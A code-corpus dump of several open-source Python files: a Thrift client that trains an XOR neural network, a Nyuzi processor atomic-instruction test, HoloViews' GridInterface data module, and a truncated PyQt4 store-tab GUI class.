repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
walter-weinmann/annlink_thrift | src_py/test_client.py | 1 | 7195 | from erlang_python import ErlangPythonServices
from helper import get_host, get_port
from os.path import basename
from thrift import Thrift
from thrift.protocol import TBinaryProtocol
from thrift.transport import TSocket
from thrift.transport import TTransport
class Dbg(object):
active = False
DEBUGGER = Dbg()
def main():
if DEBUGGER.active:
print("{} - main (): Start".format(basename(__file__)))
# --------------------------------------------------------------------------
# Read network parameters
# --------------------------------------------------------------------------
host = get_host()
port = get_port()
print(("{} - main (): This client will connect to a server with " +
"ip address {} and port number {}").format(basename(__file__), host, port))
# --------------------------------------------------------------------------
# Init thrift connection and protocol handlers
# --------------------------------------------------------------------------
# Make socket
socket = TSocket.TSocket(host, port)
# Buffering is critical. Raw sockets are very slow
transport = TTransport.TBufferedTransport(socket)
# Wrap in a protocol
protocol = TBinaryProtocol.TBinaryProtocol(transport)
# Create a client to use the protocol encoder
client = ErlangPythonServices.Client(protocol)
# Connect to server
transport.open()
# --------------------------------------------------------------------------
# XOR Training
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# > annlink:create_neural_network(Conn, [2, 10, 1]).
# {ClientId,<<"A3zfatHw5jIZVsVaNYDKAemgg0qvQ+le">>}
# --------------------------------------------------------------------------
num_inputs = 2
num_outputs = 1
learning_rate = 0.001
model_id = client.initialize_model(num_inputs,
num_outputs,
learning_rate)
size = 10
client.add_layer(model_id,
size)
activation = "sigmoid"
client.add_activation(model_id,
activation)
size = 1
client.add_layer(model_id,
size)
# --------------------------------------------------------------------------
# > Inputs = [[0,0],[0,1],[1,0],[1,1]].
# [[0,0],[0,1],[1,0],[1,1]]
# > Labels = [[0],[1],[1],[0]].
# [[0],[1],[1],[0]]
# > annlink:add_data_chunk(Conn, ClientId, Inputs, Labels).
# ok
# --------------------------------------------------------------------------
inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
labels = [[0], [1], [1], [0]]
scale = []
client.add_data_chunk(model_id,
inputs,
labels,
scale)
# --------------------------------------------------------------------------
# > annlink:set_learning_rate(Conn, ClientId, 0.05).
# ok
# --------------------------------------------------------------------------
learning_rate = 0.05
client.set_learning_rate(model_id,
learning_rate)
# --------------------------------------------------------------------------
# > annlink:train(Conn).
# 0.14462602138519287
# --------------------------------------------------------------------------
epochs = 1
batch_size = 512
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
# --------------------------------------------------------------------------
# >[annlink:train(Conn, ClientId, 200) || _ <- lists:seq(1,5)].
# which should produce something close to:
#
# [0.126319688744843,0.05803197836337134,
# 1.3663458995789856e-8,6.92154666914746e-17,
# 6.938893903907228e-18]
# --------------------------------------------------------------------------
epochs = 200
batch_size = 512
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
# --------------------------------------------------------------------------
# >annlink:predict(Conn, ClientId, [[0,0], [0,1], [1,0], [1,1]]).
# [[0.0],[1.0],[1.0],[0.0]]
# --------------------------------------------------------------------------
data = [[0, 0], [0, 1], [1, 0], [1, 1]]
result = client.predict(model_id,
data)
if DEBUGGER.active:
print(
"{} - model {} - main ({}): result from predict".format(basename(__file__), model_id,
result))
client.terminate_model(model_id),
# --------------------------------------------------------------------------
# Terminate client
# --------------------------------------------------------------------------
# Close the connection
transport.close()
if DEBUGGER.active:
print("{} - main (): Done".format(basename(__file__)))
if __name__ == "__main__":
if DEBUGGER.active:
print("{} - __main__ (): Start".format(basename(__file__)))
try:
main()
if DEBUGGER.active:
print("{} - __main__ (): Done".format(basename(__file__)))
except Thrift.TException as tx:
print("{} - __main__ (): Exception: {}".format(basename(__file__), tx.message))
| apache-2.0 | -549,609,106,085,616,960 | 33.591346 | 97 | 0.376095 | false | 5.038515 | false | false | false |
jbush001/NyuziProcessor | tests/stress/atomic/runtest.py | 1 | 1580 | #!/usr/bin/env python3
#
# Copyright 2011-2015 Jeff Bush
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test load_sync/store_sync instructions.
This uses four threads to update variables round-robin.
"""
import os
import struct
import sys
sys.path.insert(0, '../..')
import test_harness
MEM_DUMP_FILE = os.path.join(test_harness.WORK_DIR, 'vmem.bin')
@test_harness.test(['verilator'])
def atomic(_, target):
hex_file = test_harness.build_program(['atomic.S'])
test_harness.run_program(
hex_file,
target,
dump_file=MEM_DUMP_FILE,
dump_base=0x100000,
dump_length=0x800,
flush_l2=True)
with open(MEM_DUMP_FILE, 'rb') as memfile:
for _ in range(512):
val = memfile.read(4)
if len(val) < 4:
raise test_harness.TestException('output file is truncated')
num_val, = struct.unpack('<L', val)
if num_val != 10:
raise test_harness.TestException(
'FAIL: mismatch: ' + str(num_val))
test_harness.execute_tests()
| apache-2.0 | 806,546,870,032,523,100 | 28.259259 | 76 | 0.655063 | false | 3.574661 | true | false | false |
basnijholt/holoviews | holoviews/core/data/grid.py | 1 | 28647 | from __future__ import absolute_import
import sys
import datetime as dt
from collections import OrderedDict, defaultdict, Iterable
try:
import itertools.izip as zip
except ImportError:
pass
import numpy as np
from .dictionary import DictInterface
from .interface import Interface, DataError
from ..dimension import dimension_name
from ..element import Element
from ..dimension import OrderedDict as cyODict
from ..ndmapping import NdMapping, item_check, sorted_context
from .. import util
from .interface import is_dask, dask_array_module, get_array_types
class GridInterface(DictInterface):
"""
Interface for simple dictionary-based dataset format using a
compressed representation that uses the cartesian product between
key dimensions. As with DictInterface, the dictionary keys correspond
to the column (i.e dimension) names and the values are NumPy arrays
representing the values in that column.
To use this compressed format, the key dimensions must be orthogonal
to one another with each key dimension specifying an axis of the
multidimensional space occupied by the value dimension data. For
instance, given an temperature recordings sampled regularly across
the earth surface, a list of N unique latitudes and M unique
longitudes can specify the position of NxM temperature samples.
"""
types = (dict, OrderedDict, cyODict)
datatype = 'grid'
gridded = True
@classmethod
def init(cls, eltype, data, kdims, vdims):
if kdims is None:
kdims = eltype.kdims
if vdims is None:
vdims = eltype.vdims
if not vdims:
raise ValueError('GridInterface interface requires at least '
'one value dimension.')
ndims = len(kdims)
dimensions = [dimension_name(d) for d in kdims+vdims]
if isinstance(data, tuple):
data = {d: v for d, v in zip(dimensions, data)}
elif isinstance(data, list) and data == []:
data = OrderedDict([(d, []) for d in dimensions])
elif not any(isinstance(data, tuple(t for t in interface.types if t is not None))
for interface in cls.interfaces.values()):
data = {k: v for k, v in zip(dimensions, zip(*data))}
elif isinstance(data, np.ndarray):
if data.ndim == 1:
if eltype._auto_indexable_1d and len(kdims)+len(vdims)>1:
data = np.column_stack([np.arange(len(data)), data])
else:
data = np.atleast_2d(data).T
data = {k: data[:,i] for i,k in enumerate(dimensions)}
elif isinstance(data, list) and data == []:
data = {d: np.array([]) for d in dimensions[:ndims]}
data.update({d: np.empty((0,) * ndims) for d in dimensions[ndims:]})
elif not isinstance(data, dict):
raise TypeError('GridInterface must be instantiated as a '
'dictionary or tuple')
for dim in kdims+vdims:
name = dimension_name(dim)
if name not in data:
raise ValueError("Values for dimension %s not found" % dim)
if not isinstance(data[name], get_array_types()):
data[name] = np.array(data[name])
kdim_names = [dimension_name(d) for d in kdims]
vdim_names = [dimension_name(d) for d in vdims]
expected = tuple([len(data[kd]) for kd in kdim_names])
irregular_shape = data[kdim_names[0]].shape if kdim_names else ()
valid_shape = irregular_shape if len(irregular_shape) > 1 else expected[::-1]
shapes = tuple([data[kd].shape for kd in kdim_names])
for vdim in vdim_names:
shape = data[vdim].shape
error = DataError if len(shape) > 1 else ValueError
if (not expected and shape == (1,)) or (len(set((shape,)+shapes)) == 1 and len(shape) > 1):
# If empty or an irregular mesh
pass
elif len(shape) != len(expected):
raise error('The shape of the %s value array does not '
'match the expected dimensionality indicated '
'by the key dimensions. Expected %d-D array, '
'found %d-D array.' % (vdim, len(expected), len(shape)))
elif any((s!=e and (s+1)!=e) for s, e in zip(shape, valid_shape)):
raise error('Key dimension values and value array %s '
'shapes do not match. Expected shape %s, '
'actual shape: %s' % (vdim, valid_shape, shape), cls)
return data, {'kdims':kdims, 'vdims':vdims}, {}
@classmethod
def concat(cls, datasets, dimensions, vdims):
from . import Dataset
with sorted_context(False):
datasets = NdMapping(datasets, kdims=dimensions)
datasets = datasets.clone([(k, v.data if isinstance(v, Dataset) else v)
for k, v in datasets.data.items()])
if len(datasets.kdims) > 1:
items = datasets.groupby(datasets.kdims[:-1]).data.items()
return cls.concat([(k, cls.concat(v, v.kdims, vdims=vdims)) for k, v in items],
datasets.kdims[:-1], vdims)
return cls.concat_dim(datasets, datasets.kdims[0], vdims)
@classmethod
def concat_dim(cls, datasets, dim, vdims):
values, grids = zip(*datasets.items())
new_data = {k: v for k, v in grids[0].items() if k not in vdims}
new_data[dim.name] = np.array(values)
for vdim in vdims:
arrays = [grid[vdim.name] for grid in grids]
shapes = set(arr.shape for arr in arrays)
if len(shapes) > 1:
raise DataError('When concatenating gridded data the shape '
'of arrays must match. %s found that arrays '
'along the %s dimension do not match.' %
(cls.__name__, vdim.name))
stack = dask_array_module().stack if any(is_dask(arr) for arr in arrays) else np.stack
new_data[vdim.name] = stack(arrays, -1)
return new_data
@classmethod
def irregular(cls, dataset, dim):
return dataset.data[dimension_name(dim)].ndim > 1
@classmethod
def isscalar(cls, dataset, dim):
values = cls.values(dataset, dim, expanded=False)
return values.shape in ((), (1,)) or len(np.unique(values)) == 1
@classmethod
def validate(cls, dataset, vdims=True):
Interface.validate(dataset, vdims)
@classmethod
def dimension_type(cls, dataset, dim):
if dim in dataset.dimensions():
arr = cls.values(dataset, dim, False, False)
else:
return None
return arr.dtype.type
@classmethod
def shape(cls, dataset, gridded=False):
shape = dataset.data[dataset.vdims[0].name].shape
if gridded:
return shape
else:
return (np.product(shape, dtype=np.intp), len(dataset.dimensions()))
@classmethod
def length(cls, dataset):
return cls.shape(dataset)[0]
@classmethod
def _infer_interval_breaks(cls, coord, axis=0):
"""
>>> GridInterface._infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
>>> GridInterface._infer_interval_breaks([[0, 1], [3, 4]], axis=1)
array([[-0.5, 0.5, 1.5],
[ 2.5, 3.5, 4.5]])
"""
coord = np.asarray(coord)
if sys.version_info.major == 2 and len(coord) and isinstance(coord[0], (dt.datetime, dt.date)):
# np.diff does not work on datetimes in python 2
coord = coord.astype('datetime64')
if len(coord) == 0:
return np.array([], dtype=coord.dtype)
deltas = 0.5 * np.diff(coord, axis=axis)
first = np.take(coord, [0], axis=axis) - np.take(deltas, [0], axis=axis)
last = np.take(coord, [-1], axis=axis) + np.take(deltas, [-1], axis=axis)
trim_last = tuple(slice(None, -1) if n == axis else slice(None)
for n in range(coord.ndim))
return np.concatenate([first, coord[trim_last] + deltas, last], axis=axis)
@classmethod
def coords(cls, dataset, dim, ordered=False, expanded=False, edges=False):
"""
Returns the coordinates along a dimension. Ordered ensures
coordinates are in ascending order and expanded creates
ND-array matching the dimensionality of the dataset.
"""
dim = dataset.get_dimension(dim, strict=True)
irregular = cls.irregular(dataset, dim)
if irregular or expanded:
if irregular:
data = dataset.data[dim.name]
else:
data = util.expand_grid_coords(dataset, dim)
if edges and data.shape == dataset.data[dataset.vdims[0].name].shape:
data = cls._infer_interval_breaks(data, axis=1)
data = cls._infer_interval_breaks(data, axis=0)
return data
data = dataset.data[dim.name]
if ordered and np.all(data[1:] < data[:-1]):
data = data[::-1]
shape = cls.shape(dataset, True)
if dim in dataset.kdims:
idx = dataset.get_dimension_index(dim)
isedges = (dim in dataset.kdims and len(shape) == dataset.ndims
and len(data) == (shape[dataset.ndims-idx-1]+1))
else:
isedges = False
if edges and not isedges:
data = cls._infer_interval_breaks(data)
elif not edges and isedges:
data = data[:-1] + np.diff(data)/2.
return data
@classmethod
def canonicalize(cls, dataset, data, data_coords=None, virtual_coords=[]):
"""
Canonicalize takes an array of values as input and reorients
and transposes it to match the canonical format expected by
plotting functions. In certain cases the dimensions defined
via the kdims of an Element may not match the dimensions of
the underlying data. A set of data_coords may be passed in to
define the dimensionality of the data, which can then be used
to np.squeeze the data to remove any constant dimensions. If
the data is also irregular, i.e. contains multi-dimensional
coordinates, a set of virtual_coords can be supplied, required
by some interfaces (e.g. xarray) to index irregular datasets
with a virtual integer index. This ensures these coordinates
are not simply dropped.
"""
if data_coords is None:
data_coords = dataset.dimensions('key', label='name')[::-1]
# Transpose data
dims = [name for name in data_coords
if isinstance(cls.coords(dataset, name), get_array_types())]
dropped = [dims.index(d) for d in dims
if d not in dataset.kdims+virtual_coords]
if dropped:
data = np.squeeze(data, axis=tuple(dropped))
if not any(cls.irregular(dataset, d) for d in dataset.kdims):
inds = [dims.index(kd.name) for kd in dataset.kdims]
inds = [i - sum([1 for d in dropped if i>=d]) for i in inds]
if inds:
data = data.transpose(inds[::-1])
# Reorient data
invert = False
slices = []
for d in dataset.kdims[::-1]:
coords = cls.coords(dataset, d)
if np.all(coords[1:] < coords[:-1]) and not coords.ndim > 1:
slices.append(slice(None, None, -1))
invert = True
else:
slices.append(slice(None))
data = data[tuple(slices)] if invert else data
# Allow lower dimensional views into data
if len(dataset.kdims) < 2:
data = data.flatten()
return data
@classmethod
def invert_index(cls, index, length):
if np.isscalar(index):
return length - index
elif isinstance(index, slice):
start, stop = index.start, index.stop
new_start, new_stop = None, None
if start is not None:
new_stop = length - start
if stop is not None:
new_start = length - stop
return slice(new_start-1, new_stop-1)
elif isinstance(index, Iterable):
new_index = []
for ind in index:
new_index.append(length-ind)
return new_index
@classmethod
def ndloc(cls, dataset, indices):
selected = {}
adjusted_inds = []
all_scalar = True
for i, (kd, ind) in enumerate(zip(dataset.kdims[::-1], indices)):
coords = cls.coords(dataset, kd.name, True)
if np.isscalar(ind):
ind = [ind]
else:
all_scalar = False
selected[kd.name] = coords[ind]
adjusted_inds.append(ind)
for kd in dataset.kdims:
if kd.name not in selected:
coords = cls.coords(dataset, kd.name)
selected[kd.name] = coords
all_scalar = False
for d in dataset.dimensions():
if d in dataset.kdims and not cls.irregular(dataset, d):
continue
arr = cls.values(dataset, d, flat=False, compute=False)
if all_scalar and len(dataset.vdims) == 1:
return arr[tuple(ind[0] for ind in adjusted_inds)]
selected[d.name] = arr[tuple(adjusted_inds)]
return tuple(selected[d.name] for d in dataset.dimensions())
@classmethod
def values(cls, dataset, dim, expanded=True, flat=True, compute=True):
dim = dataset.get_dimension(dim, strict=True)
if dim in dataset.vdims or dataset.data[dim.name].ndim > 1:
data = dataset.data[dim.name]
data = cls.canonicalize(dataset, data)
da = dask_array_module()
if compute and da and isinstance(data, da.Array):
data = data.compute()
return data.T.flatten() if flat else data
elif expanded:
data = cls.coords(dataset, dim.name, expanded=True)
return data.T.flatten() if flat else data
else:
return cls.coords(dataset, dim.name, ordered=True)
@classmethod
def groupby(cls, dataset, dim_names, container_type, group_type, **kwargs):
# Get dimensions information
dimensions = [dataset.get_dimension(d, strict=True) for d in dim_names]
if 'kdims' in kwargs:
kdims = kwargs['kdims']
else:
kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]
kwargs['kdims'] = kdims
invalid = [d for d in dimensions if dataset.data[d.name].ndim > 1]
if invalid:
if len(invalid) == 1: invalid = "'%s'" % invalid[0]
raise ValueError("Cannot groupby irregularly sampled dimension(s) %s."
% invalid)
# Update the kwargs appropriately for Element group types
group_kwargs = {}
group_type = dict if group_type == 'raw' else group_type
if issubclass(group_type, Element):
group_kwargs.update(util.get_param_values(dataset))
else:
kwargs.pop('kdims')
group_kwargs.update(kwargs)
drop_dim = any(d not in group_kwargs['kdims'] for d in kdims)
# Find all the keys along supplied dimensions
keys = [cls.coords(dataset, d.name) for d in dimensions]
transpose = [dataset.ndims-dataset.kdims.index(kd)-1 for kd in kdims]
transpose += [i for i in range(dataset.ndims) if i not in transpose]
# Iterate over the unique entries applying selection masks
grouped_data = []
for unique_key in zip(*util.cartesian_product(keys)):
select = dict(zip(dim_names, unique_key))
if drop_dim:
group_data = dataset.select(**select)
group_data = group_data if np.isscalar(group_data) else group_data.columns()
else:
group_data = cls.select(dataset, **select)
if np.isscalar(group_data) or (isinstance(group_data, get_array_types()) and group_data.shape == ()):
group_data = {dataset.vdims[0].name: np.atleast_1d(group_data)}
for dim, v in zip(dim_names, unique_key):
group_data[dim] = np.atleast_1d(v)
elif not drop_dim:
if isinstance(group_data, get_array_types()):
group_data = {dataset.vdims[0].name: group_data}
for vdim in dataset.vdims:
data = group_data[vdim.name]
data = data.transpose(transpose[::-1])
group_data[vdim.name] = np.squeeze(data)
group_data = group_type(group_data, **group_kwargs)
grouped_data.append((tuple(unique_key), group_data))
if issubclass(container_type, NdMapping):
with item_check(False):
return container_type(grouped_data, kdims=dimensions)
else:
return container_type(grouped_data)
@classmethod
def key_select_mask(cls, dataset, values, ind):
if isinstance(ind, tuple):
ind = slice(*ind)
if isinstance(ind, get_array_types()):
mask = ind
elif isinstance(ind, slice):
mask = True
if ind.start is not None:
mask &= ind.start <= values
if ind.stop is not None:
mask &= values < ind.stop
# Expand empty mask
if mask is True:
mask = np.ones(values.shape, dtype=np.bool)
elif isinstance(ind, (set, list)):
iter_slcs = []
for ik in ind:
iter_slcs.append(values == ik)
mask = np.logical_or.reduce(iter_slcs)
elif callable(ind):
mask = ind(values)
elif ind is None:
mask = None
else:
index_mask = values == ind
if (dataset.ndims == 1 or dataset._binned) and np.sum(index_mask) == 0:
data_index = np.argmin(np.abs(values - ind))
mask = np.zeros(len(values), dtype=np.bool)
mask[data_index] = True
else:
mask = index_mask
if mask is None:
mask = np.ones(values.shape, dtype=bool)
return mask
@classmethod
def select(cls, dataset, selection_mask=None, **selection):
dimensions = dataset.kdims
val_dims = [vdim for vdim in dataset.vdims if vdim in selection]
if val_dims:
raise IndexError('Cannot slice value dimensions in compressed format, '
'convert to expanded format before slicing.')
indexed = cls.indexed(dataset, selection)
full_selection = [(d, selection.get(d.name, selection.get(d.label)))
for d in dimensions]
data = {}
value_select = []
for i, (dim, ind) in enumerate(full_selection):
irregular = cls.irregular(dataset, dim)
values = cls.coords(dataset, dim, irregular)
mask = cls.key_select_mask(dataset, values, ind)
if irregular:
if np.isscalar(ind) or isinstance(ind, (set, list)):
raise IndexError("Indexing not supported for irregularly "
"sampled data. %s value along %s dimension."
"must be a slice or 2D boolean mask."
% (ind, dim))
mask = mask.max(axis=i)
elif dataset._binned:
edges = cls.coords(dataset, dim, False, edges=True)
inds = np.argwhere(mask)
if np.isscalar(ind):
emin, emax = edges.min(), edges.max()
if ind < emin:
raise IndexError("Index %s less than lower bound "
"of %s for %s dimension." % (ind, emin, dim))
elif ind >= emax:
raise IndexError("Index %s more than or equal to upper bound "
"of %s for %s dimension." % (ind, emax, dim))
idx = max([np.digitize([ind], edges)[0]-1, 0])
mask = np.zeros(len(values), dtype=np.bool)
mask[idx] = True
values = edges[idx:idx+2]
elif len(inds):
values = edges[inds.min(): inds.max()+2]
else:
values = edges[0:0]
else:
values = values[mask]
values, mask = np.asarray(values), np.asarray(mask)
value_select.append(mask)
data[dim.name] = np.array([values]) if np.isscalar(values) else values
int_inds = [np.argwhere(v) for v in value_select][::-1]
index = np.ix_(*[np.atleast_1d(np.squeeze(ind)) if ind.ndim > 1 else np.atleast_1d(ind)
for ind in int_inds])
for kdim in dataset.kdims:
if cls.irregular(dataset, dim):
da = dask_array_module()
if da and isinstance(dataset.data[kdim.name], da.Array):
data[kdim.name] = dataset.data[kdim.name].vindex[index]
else:
data[kdim.name] = np.asarray(data[kdim.name])[index]
for vdim in dataset.vdims:
da = dask_array_module()
if da and isinstance(dataset.data[vdim.name], da.Array):
data[vdim.name] = dataset.data[vdim.name].vindex[index]
else:
data[vdim.name] = np.asarray(dataset.data[vdim.name])[index]
if indexed:
if len(dataset.vdims) == 1:
da = dask_array_module()
arr = np.squeeze(data[dataset.vdims[0].name])
if da and isinstance(arr, da.Array):
arr = arr.compute()
return arr if np.isscalar(arr) else arr[()]
else:
return np.array([np.squeeze(data[vd.name])
for vd in dataset.vdims])
return data
@classmethod
def sample(cls, dataset, samples=[]):
"""
Samples the gridded data into dataset of samples.
"""
ndims = dataset.ndims
dimensions = dataset.dimensions(label='name')
arrays = [dataset.data[vdim.name] for vdim in dataset.vdims]
data = defaultdict(list)
for sample in samples:
if np.isscalar(sample): sample = [sample]
if len(sample) != ndims:
sample = [sample[i] if i < len(sample) else None
for i in range(ndims)]
sampled, int_inds = [], []
for d, ind in zip(dimensions, sample):
cdata = dataset.data[d]
mask = cls.key_select_mask(dataset, cdata, ind)
inds = np.arange(len(cdata)) if mask is None else np.argwhere(mask)
int_inds.append(inds)
sampled.append(cdata[mask])
for d, arr in zip(dimensions, np.meshgrid(*sampled)):
data[d].append(arr)
for vdim, array in zip(dataset.vdims, arrays):
da = dask_array_module()
flat_index = np.ravel_multi_index(tuple(int_inds)[::-1], array.shape)
if da and isinstance(array, da.Array):
data[vdim.name].append(array.flatten().vindex[tuple(flat_index)])
else:
data[vdim.name].append(array.flat[flat_index])
concatenated = {d: np.concatenate(arrays).flatten() for d, arrays in data.items()}
return concatenated
@classmethod
def aggregate(cls, dataset, kdims, function, **kwargs):
kdims = [dimension_name(kd) for kd in kdims]
data = {kdim: dataset.data[kdim] for kdim in kdims}
axes = tuple(dataset.ndims-dataset.get_dimension_index(kdim)-1
for kdim in dataset.kdims if kdim not in kdims)
da = dask_array_module()
dropped = []
for vdim in dataset.vdims:
values = dataset.data[vdim.name]
atleast_1d = da.atleast_1d if is_dask(values) else np.atleast_1d
try:
data[vdim.name] = atleast_1d(function(values, axis=axes, **kwargs))
except TypeError:
dropped.append(vdim)
return data, dropped
@classmethod
def reindex(cls, dataset, kdims, vdims):
dropped_kdims = [kd for kd in dataset.kdims if kd not in kdims]
dropped_vdims = ([vdim for vdim in dataset.vdims
if vdim not in vdims] if vdims else [])
constant = {}
for kd in dropped_kdims:
vals = cls.values(dataset, kd.name, expanded=False)
if len(vals) == 1:
constant[kd.name] = vals[0]
data = {k: values for k, values in dataset.data.items()
if k not in dropped_kdims+dropped_vdims}
if len(constant) == len(dropped_kdims):
joined_dims = kdims+dropped_kdims
axes = tuple(dataset.ndims-dataset.kdims.index(d)-1
for d in joined_dims)
dropped_axes = tuple(dataset.ndims-joined_dims.index(d)-1
for d in dropped_kdims)
for vdim in vdims:
vdata = data[vdim.name]
if len(axes) > 1:
vdata = vdata.transpose(axes[::-1])
if dropped_axes:
vdata = np.squeeze(vdata, axis=dropped_axes)
data[vdim.name] = vdata
return data
elif dropped_kdims:
return tuple(dataset.columns(kdims+vdims).values())
return data
@classmethod
def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
if not vdim:
raise Exception("Cannot add key dimension to a dense representation.")
dim = dimension_name(dimension)
return dict(dataset.data, **{dim: values})
@classmethod
def sort(cls, dataset, by=[], reverse=False):
if not by or by in [dataset.kdims, dataset.dimensions()]:
return dataset.data
else:
raise Exception('Compressed format cannot be sorted, either instantiate '
'in the desired order or use the expanded format.')
@classmethod
def iloc(cls, dataset, index):
rows, cols = index
scalar = False
if np.isscalar(cols):
scalar = np.isscalar(rows)
cols = [dataset.get_dimension(cols, strict=True)]
elif isinstance(cols, slice):
cols = dataset.dimensions()[cols]
else:
cols = [dataset.get_dimension(d, strict=True) for d in cols]
if np.isscalar(rows):
rows = [rows]
new_data = []
for d in cols:
new_data.append(cls.values(dataset, d, compute=False)[rows])
if scalar:
da = dask_array_module()
if new_data and (da and isinstance(new_data[0], da.Array)):
return new_data[0].compute()[0]
return new_data[0][0]
return tuple(new_data)
@classmethod
def range(cls, dataset, dimension):
if dataset._binned and dimension in dataset.kdims:
expanded = cls.irregular(dataset, dimension)
column = cls.coords(dataset, dimension, expanded=expanded, edges=True)
else:
column = cls.values(dataset, dimension, expanded=False, flat=False)
da = dask_array_module()
if column.dtype.kind == 'M':
dmin, dmax = column.min(), column.max()
if da and isinstance(column, da.Array):
return da.compute(dmin, dmax)
return dmin, dmax
elif len(column) == 0:
return np.NaN, np.NaN
else:
try:
dmin, dmax = (np.nanmin(column), np.nanmax(column))
if da and isinstance(column, da.Array):
return da.compute(dmin, dmax)
return dmin, dmax
except TypeError:
column.sort()
return column[0], column[-1]
Interface.register(GridInterface)
| bsd-3-clause | -7,135,710,993,006,160,000 | 40.397399 | 113 | 0.554857 | false | 4.04733 | false | false | false |
cgsheeh/SFWR3XA3_Redevelopment | src/TabWidgets.py | 1 | 73329 | # -*- coding: utf-8 -*-
#
# Created: Fri Nov 13 14:07:26 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
import hashlib
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
##
# StoreTab2
# This class is the GUI for a user's store.
class storeTab2(QtGui.QWidget):
##
# Constructor
# Creates a users store for viewing.
# @param store: holds store data representation
def __init__(self, merchant_representation):
super(storeTab2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(1038, 686)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.label_12 = QtGui.QLabel(self)
self.label_12.setGeometry(QtCore.QRect(0, 460, 111, 17))
self.label_12.setObjectName(_fromUtf8("label_12"))
##
# Set up table of user contracts and headers
self.contractTable = QtGui.QTableWidget(self)
self.contractTable.setGeometry(QtCore.QRect(0, 480, 1031, 201))
self.contractTable.setObjectName(_fromUtf8("contractTable"))
self.contractTable.setColumnCount(4)
item = QtGui.QTableWidgetItem()
item.setText("Item Name")
self.contractTable.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
item.setText("Price")
self.contractTable.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
item.setText("Expiry")
self.contractTable.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
item.setText("Description")
self.contractTable.setHorizontalHeaderItem(3, item)
self.contractTable.itemClicked.connect(self.contract_clicked)
##
# Add listings to table of contracts
for count, listing in enumerate(merchant_representation.get_listings()):
trade_info = listing.get_module('trade')
metadata = listing.get_module('metadata')
##
# Set row label to contract hash
self.contractTable.setRowCount(count + 1)
item = QtGui.QTableWidgetItem()
item.setText(str(listing.contract_hash()))
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setVerticalHeaderItem(count, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['name'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 0, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['price'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 1, item)
item = QtGui.QTableWidgetItem()
item.setText(metadata['expiry'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 2, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['description'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 3, item)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 406))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
